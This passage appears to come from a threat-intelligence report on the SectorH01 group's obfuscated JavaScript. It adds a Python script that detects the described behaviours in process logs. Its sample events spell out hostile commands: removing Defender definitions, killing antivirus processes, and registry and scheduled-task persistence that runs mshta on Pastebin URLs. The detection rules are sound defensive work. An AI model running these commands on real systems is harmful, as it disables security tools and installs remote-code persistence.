After looking at the various scripts used, we observed that these obfuscated JavaScript scripts mainly serve one or more of the following purposes:
- Terminating the Microsoft Office processes winword.exe, excel.exe, MSPUB.exe and POWERPNT.exe, and sometimes the Windows Defender processes MSASCuiL.exe and MpCmdRun.exe
- Interfering with Windows Defender via the command “MpCmdRun.exe -removedefinitions -dynamicsignatures”
- Setting registry autorun persistence that executes mshta.exe on a Pastebin URL
- Setting scheduled task persistence that executes mshta.exe on a Pastebin URL
- Executing malware in memory, sometimes via Microsoft’s .NET MSBuild.exe
In most cases, the SectorH01 group in fact performed all of the above, sometimes several at once, by stacking multiple Pastebin URLs and multiple commands in a single URL. Moreover, since the SectorH01 group uses the “Hagga” Pastebin account, which allows the owner to edit their pastes, they at times modify a paste so that the same URL performs different actions.
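As an added example (not code from the article), the behaviours listed above can be expressed as simple rules over process-creation events such as a flattened Sysmon Event ID 1 export. The sample events, the placeholder Pastebin paths and the exact taskkill/reg/schtasks command forms are constructed assumptions; the article names only the outcomes.

```python
import re

# Constructed sample events (not from the article) in the shape
# "parent_image|image|command_line". Pastebin paths are placeholders.
SAMPLE_EVENTS = [
    "winword.exe|mshta.exe|mshta.exe https://pastebin.com/raw/PLACEHOLDER1",
    "cmd.exe|MpCmdRun.exe|MpCmdRun.exe -removedefinitions -dynamicsignatures",
    "cmd.exe|taskkill.exe|taskkill /f /im winword.exe /im excel.exe /im MSASCuiL.exe",
    "cmd.exe|reg.exe|reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "/v Update /d \"mshta.exe https://pastebin.com/raw/PLACEHOLDER2\"",
    "cmd.exe|schtasks.exe|schtasks /create /sc minute /mo 30 /tn Update "
    "/tr \"mshta.exe https://pastebin.com/raw/PLACEHOLDER3\"",
    "mshta.exe|MSBuild.exe|MSBuild.exe C:\\Users\\Public\\stage.xml",
    "explorer.exe|notepad.exe|notepad.exe C:\\Users\\a\\notes.txt",
]

# Processes the article says the scripts terminate (Office plus Defender UI/CLI).
OFFICE_AND_AV = r"winword|excel|mspub|powerpnt|msascuil|mpcmdrun"

# Each rule: (name, image regex, parent regex or None, command-line regex).
# All matching is done on lower-cased fields.
RULES = [
    ("mshta_pastebin_url", r"^mshta\.exe$", None, r"pastebin\.com"),
    ("defender_definitions_removed", r"^mpcmdrun\.exe$", None, r"-removedefinitions"),
    ("office_or_av_process_kill", r"^taskkill\.exe$", None, OFFICE_AND_AV),
    ("run_key_persistence_mshta", r"^reg\.exe$", None, r"\\run\b.*mshta"),
    ("schtask_persistence_mshta", r"^schtasks\.exe$", None, r"/create.*mshta"),
    ("msbuild_from_script_host", r"^msbuild\.exe$", r"^(mshta|wscript|cscript)\.exe$", r"."),
]


def classify(event: str) -> list[str]:
    """Return the names of every rule matched by one 'parent|image|cmdline' event."""
    parent, image, cmdline = (part.lower() for part in event.split("|", 2))
    hits = []
    for name, image_re, parent_re, cmd_re in RULES:
        if not re.search(image_re, image):
            continue
        if parent_re and not re.search(parent_re, parent):
            continue
        if re.search(cmd_re, cmdline):
            hits.append(name)
    return hits


def scan(events) -> dict[str, list[str]]:
    """Map each matched rule name to the events that triggered it."""
    alerts: dict[str, list[str]] = {}
    for event in events:
        for name in classify(event):
            alerts.setdefault(name, []).append(event)
    return alerts


if __name__ == "__main__":
    for name, matched in scan(SAMPLE_EVENTS).items():
        print(f"{name}: {len(matched)} event(s)")
```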
To read the complete article see:
https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/